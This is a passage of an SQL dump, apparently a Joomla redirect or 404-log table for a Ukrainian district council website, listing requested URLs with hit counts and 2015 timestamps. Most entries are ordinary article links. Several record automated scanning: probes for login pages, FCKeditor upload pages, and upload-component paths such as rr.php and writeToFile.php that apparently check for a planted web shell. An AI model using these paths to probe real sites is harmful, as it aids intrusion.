00:00:00',301),(12202,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1274:----------------l--r&lang=uk&option=com_content&view=article','','','',6,0,'2015-01-18 07:27:20','0000-00-00 00:00:00',301),(12203,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1131:9-------&lang=uk&option=com_content&view=article','','','',3,0,'2015-01-18 11:42:52','0000-00-00 00:00:00',301),(12204,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1146:2013-11-27-10-09-00&lang=ru&option=com_content&view=article','','','',3,0,'2015-01-18 16:17:12','0000-00-00 00:00:00',301),(12205,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1057:--22072013--2100-&lang=uk&option=com_content&view=article','','','',4,0,'2015-01-18 17:46:51','0000-00-00 00:00:00',301),(12206,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1021:-l-r&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-18 19:19:58','0000-00-00 00:00:00',301),(12207,'http://malyn-rayrada.org.ua/~onkoloji/index.php','','','',1,0,'2015-01-18 22:27:00','0000-00-00 00:00:00',301),(12208,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1074:2013-09-02-05-02-30&lang=uk&option=com_content&view=article','','','',3,0,'2015-01-19 02:31:25','0000-00-00 00:00:00',301),(12209,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54:--29112013-&id=1141:2013-11-26-13-18-12&lang=uk&option=com_content&view=article','','','',2,0,'2015-01-19 21:11:40','0000-00-00 00:00:00',301),(12210,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&catid=58:--30042014-&id=1244:-2014-2018-&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-19 22:21:12','0000-00-00 00:00:00',301),(12211,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1004:2013-05-04-11-41-00&lang=ru&option=com_content&view=article','','','',4,0,'2015-01-19 23:50:27','0000-00-00 00:00:00',301),(12212,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1201:2014-01-31-07-43-11&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-20 00:28:47','0000-00-00 00:00:00',301),(12213,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1325:2014-05-29-06-00-31&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-20 01:20:54','0000-00-00 00:00:00',301),(12214,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1319:-2014-&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-20 06:22:46','0000-00-00 00:00:00',301),(12215,'http://malyn-rayrada.org.ua/forums/index.php','','','',6,0,'2015-01-20 08:21:40','0000-00-00 00:00:00',301),(12216,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1320:-15-2010-12-l-r&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-20 08:55:33','0000-00-00 00:00:00',301),(12217,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&catid=58:--30042014-&id=1304:2014-04-30-09-11-23&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-20 09:22:08','0000-00-00 00:00:00',301),(12218,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1272:2014-04-09-05-15-36&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-20 11:29:54','0000-00-00 00:00:00',301),(12219,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1121:--24--6-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2015-01-20 13:50:30','0000-00-00 00:00:00',301),(12220,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1000:1&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-20 18:18:58','0000-00-00 00:00:00',301),(12221,'http://malyn-rayrada.org.ua/bilisim/index.php','','','',1,0,'2015-01-20 19:53:14','0000-00-00 00:00:00',301),(12222,'http://www.malyn-rayrada.org.ua/tr-tr/index.php','','','',1,0,'2015-01-21 04:12:54','0000-00-00 00:00:00',301),(12223,'http://www.malyn-rayrada.org.ua/index.php/--03022014-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/--03022014-/678-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_23','',2,0,'2015-01-21 12:17:46','0000-00-00 00:00:00',301),(12224,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1365:2014-07-10-13-58-58&lang=uk&option=com_content&view=article','','','',2,0,'2015-01-21 15:09:00','0000-00-00 00:00:00',301),(12225,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1243:2014-03-17-07-32-47&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-21 20:46:20','0000-00-00 00:00:00',301),(12226,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&id&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-21 22:42:01','0000-00-00 00:00:00',301),(12227,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/media/system/images/mootree_loader.gif','','','',1,0,'2015-01-22 07:04:44','0000-00-00 00:00:00',301),(12228,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1343:2014-06-14-17-26-47&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-22 07:41:34','0000-00-00 00:00:00',301),(12229,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1109:2013-10-18-10-25-30&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-22 11:22:49','0000-00-00 00:00:00',301),(12230,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1086:2013-09-16-13-00-16&lang=ru&option=com_content&view=article','','','',3,0,'2015-01-22 15:46:04','0000-00-00 00:00:00',301),(12231,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1011:2013-05-29-09-51-28&lang=en&option=com_content&view=article','','','',1,0,'2015-01-22 17:26:38','0000-00-00 00:00:00',301),(12232,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1046:-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-23 04:58:06','0000-00-00 00:00:00',301),(12233,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1041:2013-07-02-13-55-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-01-23 11:45:10','0000-00-00 00:00:00',301),(12234,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1075:2013-09-06-09-25-33&tmpl=component&print=1&layout=default&page=&lang=uk','','','',1,0,'2015-01-23 19:38:08','0000-00-00 00:00:00',301),(12235,'http://www.malyn-rayrada.org.ua/images/stories/pixel.php?rf','','','',1,0,'2015-01-23 23:34:58','0000-00-00 00:00:00',301),(12236,'http://malyn-rayrada.org.ua/section/wp-login.php','','','',8,0,'2015-01-24 03:46:52','0000-00-00 00:00:00',301),(12237,'http://malyn-rayrada.org.ua/admin/wp-login.php','','','',8,0,'2015-01-24 03:46:55','0000-00-00 00:00:00',301),(12238,'http://www.malyn-rayrada.org.ua/section/wp-login.php','','','',5,0,'2015-01-24 03:48:13','0000-00-00 00:00:00',301),(12239,'http://www.malyn-rayrada.org.ua/admin/wp-login.php','','','',6,0,'2015-01-24 03:48:17','0000-00-00 00:00:00',301),(12240,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1360:-------qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2015-01-24 04:14:16','0000-00-00 00:00:00',301),(12241,'http://www.malyn-rayrada.org.ua/attachments/article/952/на','','','',1,0,'2015-01-24 06:40:40','0000-00-00 00:00:00',301),(12242,'http://www.malyn-rayrada.org.ua/attachments/article/976/До','','','',1,0,'2015-01-24 06:40:53','0000-00-00 00:00:00',301),(12243,'http://www.malyn-rayrada.org.ua/attachments/article/976/гру','','','',1,0,'2015-01-24 06:42:56','0000-00-00 00:00:00',301),(12244,'http://www.malyn-rayrada.org.ua/attachments/article/939/лиѥтопа','','','',1,0,'2015-01-24 06:43:09','0000-00-00 00:00:00',301),(12245,'http://www.malyn-rayrada.org.ua/attachments/article/999/','','','',1,0,'2015-01-24 08:19:42','0000-00-00 00:00:00',301),(12246,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1019:2013-06-06-11-26-38&lang=uk&option=com_content&view=article','','','',2,0,'2015-01-24 12:55:27','0000-00-00 00:00:00',301),(12247,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/levkovec.jpg','','','',3,0,'2015-01-24 23:18:36','0000-00-00 00:00:00',301),(12248,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/_320x240.jpg','','','',3,0,'2015-01-24 23:18:46','0000-00-00 00:00:00',301),(12249,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1146:2013-11-27-10-09-00&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-25 14:19:30','0000-00-00 00:00:00',301),(12250,'http://www.malyn-rayrada.org.ua/attachments/article/880/','','','',1,0,'2015-01-25 22:14:45','0000-00-00 00:00:00',301),(12254,'http://www.malyn-rayrada.org.ua/attachments/article/939/ли','','','',1,0,'2015-01-26 03:55:48','0000-00-00 00:00:00',301),(12255,'http://www.malyn-rayrada.org.ua/www.youtube-nocookie.com/v/kxMFd7ib75M?version=3&hl=ru_RU&rel=0','','','',1,0,'2015-01-26 07:25:52','0000-00-00 00:00:00',301),(12256,'http://www.malyn-rayrada.org.ua/www.youtube-nocookie.com/v/dFuP6plNwNE?hl=ru_RU&version=3&rel=0','','','',1,0,'2015-01-26 07:26:05','0000-00-00 00:00:00',301),(12257,'http://www.malyn-rayrada.org.ua/www.youtube-nocookie.com/v/-YRMWcZGQwQ?version=3&hl=ru_RU&rel=0','','','',1,0,'2015-01-26 07:26:32','0000-00-00 00:00:00',301),(12258,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1329:2014-06-02-11-51-47&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-26 07:35:46','0000-00-00 00:00:00',301),(12259,'http://www.malyn-rayrada.org.ua/attachments/article/940/','','','',1,0,'2015-01-26 07:36:00','0000-00-00 00:00:00',301),(12260,'http://www.malyn-rayrada.org.ua/attachments/article/981/Програма пі','','','',1,0,'2015-01-26 10:03:51','0000-00-00 00:00:00',301),(12261,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/zukraine.gif','','','',4,0,'2015-01-26 11:09:50','0000-00-00 00:00:00',301),(12262,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1018:2013-06-06-11-22-34&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-26 23:49:34','0000-00-00 00:00:00',301),(12263,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1185:2014-01-28-09-38-54&lang=uk&option=com_content&view=article','','','',3,0,'2015-01-27 03:27:51','0000-00-00 00:00:00',301),(12264,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1305:-30----&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-27 04:14:01','0000-00-00 00:00:00',301),(12265,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1084:-qq&tmpl=component&print=1&layout=default&page=&lang=uk','','','',1,0,'2015-01-27 13:34:38','0000-00-00 00:00:00',301),(12266,'http://www.malyn-rayrada.org.ua/index.php/undefined','','http://www.malyn-rayrada.org.ua/index.php/989-indeksatsiya-normativnoji-groshovoji-otsinki-zemel','',7,0,'2015-01-27 13:45:24','0000-00-00 00:00:00',301),(12267,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1133:2013-11-14-07-12-22&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-27 18:27:42','0000-00-00 00:00:00',301),(12268,'http://www.malyn-rayrada.org.ua/index.php/984-do-vidoma-deputativ-rajonnoji-radi-grafik-provedennya-postijnikh-komisij','','','',26,0,'2015-01-27 23:02:52','0000-00-00 00:00:00',301),(12269,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1097:2013-09-25-08-35-50&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-28 01:17:10','0000-00-00 00:00:00',301),(12270,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1171:2014-01-11-09-58-40&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-28 02:49:53','0000-00-00 00:00:00',301),(12271,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=907:2013-01-21-08-54-59&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-28 08:43:47','0000-00-00 00:00:00',301),(12272,'http://malyn-rayrada.org.ua/uk/index.php','','','',1,0,'2015-01-28 14:16:30','0000-00-00 00:00:00',301),(12273,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1178:2014-01-21-12-39-34&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-28 18:02:16','0000-00-00 00:00:00',301),(12274,'http://www.malyn-rayrada.org.ua/attachments/article/945/-D0-9C-D0-B0-D1-82-D0-B5-D1-80-D1-96-D0-B0-D0-BB-D0-B8-20-D0-91-D1-83-D1-80-D0-BA-D1-83-D1-88.pdf','','','',1,0,'2015-01-28 18:09:52','0000-00-00 00:00:00',301),(12275,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1285:2014-04-17-16-55-05&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-29 03:25:55','0000-00-00 00:00:00',301),(12276,'http://www.malyn-rayrada.org.ua/uk/index.php','','','',1,0,'2015-01-29 03:30:48','0000-00-00 00:00:00',301),(12277,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/909-pro-nadannya-dozvolu-komunalnij-ustanovi-malinskij-rajonnij-trudovij-arkhiv-na-bezoplatne-prijnyattya-dokumentiv','','','',2,0,'2015-01-29 08:36:55','0000-00-00 00:00:00',301),(12278,'http://malyn-rayrada.org.ua/islam/index.php','','','',1,0,'2015-01-29 09:06:00','0000-00-00 00:00:00',301),(12279,'http://malyn-rayrada.org.ua/dict/index.php','','','',1,0,'2015-01-29 09:35:28','0000-00-00 00:00:00',301),(12280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-------l---28r-&catid=36&Itemid=70&lang=uk','','','',2,0,'2015-01-29 12:32:10','0000-00-00 00:00:00',301),(12281,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1110:-9-2013-&tmpl=component&print=1&layout=default&page=&lang=uk','','','',1,0,'2015-01-29 12:45:39','0000-00-00 00:00:00',301),(12282,'http://malyn-rayrada.org.ua/index.php/984-do-vidoma-deputativ-rajonnoji-radi-grafik-provedennya-postijnikh-komisij','','','',11,0,'2015-01-29 13:54:42','0000-00-00 00:00:00',301),(12283,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1313:2014-05-14-10-00-55&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-29 15:39:25','0000-00-00 00:00:00',301),(12284,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1178:2014-01-21-12-39-34&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-29 18:58:30','0000-00-00 00:00:00',301),(12285,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1209:-----2014-&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-29 20:10:36','0000-00-00 00:00:00',301),(12286,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1109:2013-10-18-10-25-30&tmpl=component&print=1&layout=default&page=&lang=uk','','','',1,0,'2015-01-30 08:59:06','0000-00-00 00:00:00',301),(12287,'http://malyn-rayrada.org.ua/index.php?option=com_user&task=register','','','',1,0,'2015-01-30 13:34:33','0000-00-00 00:00:00',301),(12288,'http://www.malyn-rayrada.org.ua/tr/index.php','','','',3,0,'2015-01-30 16:04:01','0000-00-00 00:00:00',301),(12289,'http://www.malyn-rayrada.org.ua/news/index.php','','','',1,0,'2015-01-31 01:51:54','0000-00-00 00:00:00',301),(12290,'http://www.malyn-rayrada.org.ua/main/index.php','','','',1,0,'2015-01-31 07:32:39','0000-00-00 00:00:00',301),(12291,'http://www.malyn-rayrada.org.ua/v4/index.php','','','',2,0,'2015-01-31 13:58:32','0000-00-00 00:00:00',301),(12292,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1201:2014-01-31-07-43-11&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-31 23:51:31','0000-00-00 00:00:00',301),(12293,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1174:-2013-&lang=ru&option=com_content&view=article','','','',2,0,'2015-02-01 07:16:55','0000-00-00 00:00:00',301),(12294,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/909-pro-nadannya-dozvolu-komunalnij-ustanovi-malinskij-rajonnij-trudovij-arkhiv-na-bezoplatne-prijnyattya-dokumentiv','','','',34,0,'2015-02-01 11:22:12','0000-00-00 00:00:00',301),(12295,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/909-pro-nadannya-dozvolu-komunalnij-ustanovi-malinskij-rajonnij-trudovij-arkhiv-na-bezoplatne-prijnyattya-dokumentiv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-02-01 11:22:15','0000-00-00 00:00:00',301),(12296,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1139:---------14112013--84-l--25-----6-r&lang=uk&option=com_content&view=article','','','',2,0,'2015-02-01 17:05:40','0000-00-00 00:00:00',301),(12297,'http://www.malyn-rayrada.org.ua/dd/index.php','','','',1,0,'2015-02-02 04:14:48','0000-00-00 00:00:00',301),(12298,'http://malyn-rayrada.org.ua/index.php/907-do-vidoma-deputativ-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-02-02 11:02:39','0000-00-00 00:00:00',301),(12299,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/909-pro-nadannya-dozvolu-komunalnij-ustanovi-malinskij-rajonnij-trudovij-arkhiv-na-bezoplatne-prijnyattya-dokumentiv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-02-02 11:09:46','0000-00-00 00:00:00',301),(12300,'http://www.malyn-rayrada.org.ua/index.php/907-do-vidoma-deputativ-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-02-02 11:11:33','0000-00-00 00:00:00',301),(12301,'http://www.malyn-rayrada.org.ua/index.php/915-ogoloshennya-shchodo-orendi-komunalnogo-majna?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-02-02 11:11:39','0000-00-00 00:00:00',301),(12302,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1075:2013-09-06-09-25-33&lang=uk&option=com_content&view=article','','','',1,0,'2015-02-02 13:03:48','0000-00-00 00:00:00',301),(12303,'http://malyn-rayrada.org.ua/word/index.php','','','',1,0,'2015-02-02 21:11:25','0000-00-00 00:00:00',301),(12304,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1252:2014-03-24-17-19-07&lang=ru&option=com_content&view=article','','','',1,0,'2015-02-03 01:47:14','0000-00-00 00:00:00',301),(12305,'http://www.malyn-rayrada.org.ua/index.php/918-shchodo-orendi-komunalnogo-majna?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-02-03 08:41:55','0000-00-00 00:00:00',301),(12306,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1201:2014-01-31-07-43-11&lang=ru&option=com_content&view=article','','','',2,0,'2015-02-03 17:19:59','0000-00-00 00:00:00',301),(12307,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=918:-2013-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2015-02-04 05:19:07','0000-00-00 00:00:00',301),(12308,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1328:2014-06-01-11-58-56&lang=ru&option=com_content&view=article','','','',1,0,'2015-02-04 05:58:48','0000-00-00 00:00:00',301),(12309,'http://www.malyn-rayrada.org.ua/2/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2015-02-04 10:51:06','0000-00-00 00:00:00',301),(12310,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1023:-------l---28r-&lang=uk&option=com_content&view=article','','','',4,0,'2015-02-05 12:01:35','0000-00-00 00:00:00',301),(12311,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=915:-14-2012-340-l-2012-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2015-02-05 13:32:17','0000-00-00 00:00:00',301),(12312,'http://www.malyn-rayrada.org.ua/admin/fckeditor/editor/fckeditor.html','','','',2,0,'2015-02-05 15:58:06','0000-00-00 00:00:00',301),(12313,'http://www.malyn-rayrada.org.ua/admin/fckeditor/editor/filemanager/browser/default/browser.html','','','',2,0,'2015-02-05 15:58:09','0000-00-00 00:00:00',301),(12314,'http://www.malyn-rayrada.org.ua/admin/FCKeditor/editor/filemanager/upload/test.html','','','',1,0,'2015-02-05 15:58:17','0000-00-00 00:00:00',301),(12315,'http://www.malyn-rayrada.org.ua/admin/js/fckeditor/editor/filemanager/connectors/test.html','','','',1,0,'2015-02-05 15:58:20','0000-00-00 00:00:00',301),(12316,'http://www.malyn-rayrada.org.ua/admin/wo_edit/editor/fckdebug.html','','','',1,0,'2015-02-05 15:58:23','0000-00-00 00:00:00',301),(12317,'http://www.malyn-rayrada.org.ua/editor/fckeditor/editor/fckdebug.html','','','',1,0,'2015-02-05 15:58:27','0000-00-00 00:00:00',301),(12318,'http://www.malyn-rayrada.org.ua/fckeditor/dialog/fck_about.html','','','',1,0,'2015-02-05 15:58:31','0000-00-00 00:00:00',301),(12319,'http://www.malyn-rayrada.org.ua/FCKeditor/editor/filemanager/browser/default/browser.html','','','',2,0,'2015-02-05 15:58:35','0000-00-00 00:00:00',301),(12320,'http://www.malyn-rayrada.org.ua/FCKeditor/editor/filemanager/connectors/','','','',1,0,'2015-02-05 15:58:51','0000-00-00 00:00:00',301),(12321,'http://www.malyn-rayrada.org.ua/fckeditor/editor/filemanager/upload/test.html','','','',2,0,'2015-02-05 15:59:15','0000-00-00 00:00:00',301),(12322,'http://www.malyn-rayrada.org.ua/FCKeditor/_whatsnew.html','','','',1,0,'2015-02-05 15:59:29','0000-00-00 00:00:00',301),(12323,'http://www.malyn-rayrada.org.ua/include/fckeditor/editor/fckeditor.html','','','',2,0,'2015-02-05 15:59:32','0000-00-00 00:00:00',301),(12324,'http://www.malyn-rayrada.org.ua/include/fckeditor/editor/filemanager/browser/default/browser.html','','','',2,0,'2015-02-05 15:59:36','0000-00-00 00:00:00',301),(12325,'http://www.malyn-rayrada.org.ua/include/fckeditor/editor/filemanager/upload/test.html','','','',2,0,'2015-02-05 15:59:41','0000-00-00 00:00:00',301),(12326,'http://www.malyn-rayrada.org.ua/include/js/fckeditor/editor/filemanager/connectors/test.html','','','',1,0,'2015-02-05 15:59:46','0000-00-00 00:00:00',301),(12327,'http://www.malyn-rayrada.org.ua/includes/fckeditor/editor/fckeditor.html','','','',1,0,'2015-02-05 15:59:49','0000-00-00 00:00:00',301),(12328,'http://www.malyn-rayrada.org.ua/includes/fckeditor/editor/filemanager/browser/default/browser.html','','','',2,0,'2015-02-05 15:59:51','0000-00-00 00:00:00',301),(12329,'http://www.malyn-rayrada.org.ua/includes/fckeditor/editor/filemanager/upload/test.html','','','',2,0,'2015-02-05 15:59:56','0000-00-00 00:00:00',301),(12330,'http://www.malyn-rayrada.org.ua/includes/js/fckeditor/editor/filemanager/connectors/test.html','','','',1,0,'2015-02-05 16:00:04','0000-00-00 00:00:00',301),(12331,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1291:2014-04-23-11-37-34&lang=uk&option=com_content&view=article','','','',4,0,'2015-02-05 19:32:58','0000-00-00 00:00:00',301),(12332,'http://www.malyn-rayrada.org.ua/admin.php','','','',7,0,'2015-02-05 20:32:02','0000-00-00 00:00:00',301),(12333,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1249:2014-03-24-06-41-46&lang=ru&option=com_content&view=article','','','',2,0,'2015-02-05 21:04:10','0000-00-00 00:00:00',301),(12334,'http://www.malyn-rayrada.org.ua/wp-admin/admin-ajax.php','','','',18,0,'2015-02-05 22:07:13','0000-00-00 00:00:00',301),(12335,'http://www.malyn-rayrada.org.ua/ganteng.gif/index.php','','','',1,0,'2015-02-05 22:07:19','0000-00-00 00:00:00',301),(12336,'http://www.malyn-rayrada.org.ua/ganteng.gif/components/com_creativecontactform/fileupload/files/rr.php?ifztc','','','',1,0,'2015-02-05 22:07:22','0000-00-00 00:00:00',301),(12337,'http://www.malyn-rayrada.org.ua/ganteng.gif/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2015-02-05 22:07:24','0000-00-00 00:00:00',301),(12338,'http://www.malyn-rayrada.org.ua/ganteng.gif/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2015-02-05 22:07:27','0000-00-00 00:00:00',301),(12339,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1165:-2014-&lang=uk&option=com_content&view=article','','','',6,0,'2015-02-06 01:38:29','0000-00-00 00:00:00',301),(12340,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1191:-2014-&lang=ru&option=com_content&view=article','','','',5,0,'2015-02-06 01:59:04','0000-00-00 00:00:00',301),(12341,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1188:2014-01-28-09-45-21&lang=uk&option=com_content&view=article','','','',2,0,'2015-02-06 05:01:58','0000-00-00 00:00:00',301),(12342,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1094:2013-09-24-05-02-52&tmpl=component&print=1&layout=default&page=&lang=uk','','','',2,0,'2015-02-06 05:57:08','0000-00-00 00:00:00',301),(12343,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1216:-q-q&lang=uk&option=com_content&view=article','','','',2,0,'2015-02-06 06:15:22','0000-00-00 00:00:00',301),(12344,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&id=2&lang=ru&option=com_phocagallery&view=category','','','',1,0,'2015-02-06 12:24:09','0000-00-00 00:00:00',301),(12345,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1129:2013-11-06-13-36-25&lang=ru&option=com_content&view=article','','','',1,0,'2015-02-06 14:20:45','0000-00-00 00:00:00',301),(12346,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2015-02-07 05:59:35','0000-00-00 00:00:00',301),(12347,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1120:2013-10-25-12-32-17&lang=ru&option=com_content&view=article','','','',1,0,'2015-02-07 06:00:25','0000-00-00 00:00:00',301),(12348,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=4:2010-08-13-08-15-19&lang=en','','','',1,0,'2015-02-07 06:49:30','0000-00-00 00:00:00',301),(12349,'http://malyn-rayrada.org.ua/index.php/984-do-vidoma-deputativ-rajonnoji-radi-grafik-provedennya-postijnikh-komisij?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-02-07 09:43:18','0000-00-00 00:00:00',301),(12350,'http://malyn-rayrada.org.ua/index.php/958-do-vidoma-deputativ-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-02-07 09:46:28','0000-00-00 00:00:00',301),(12351,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1090:-l-r-&lang=uk&option=com_content&view=article','','','',1,0,'2015-02-07 15:38:45','0000-00-00 00:00:00',301),(12352,'http://malyn-rayrada.org.ua/ecard/index.php','','','',1,0,'2015-02-07 21:52:50','0000-00-00 00:00:00',301),(12353,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1018:2013-06-06-11-22-34&lang=uk&option=com_content&view=article','','','',1,0,'2015-02-08 04:34:03','0000-00-00 00:00:00',301),(12354,'http://www.malyn-rayrada.org.ua/admin/index.php','','','',9,0,'2015-02-08 05:47:25','0000-00-00 00:00:00',301),(12355,'http://www.malyn-rayrada.org.ua/bitrix/admin/index.php?lang=en','','','',11,0,'2015-02-08 05:47:27','0000-00-00 00:00:00',301),(12356,'http://www.malyn-rayrada.org.ua/en/index.php','','','',2,0,'2015-02-08 07:43:00','0000-00-00 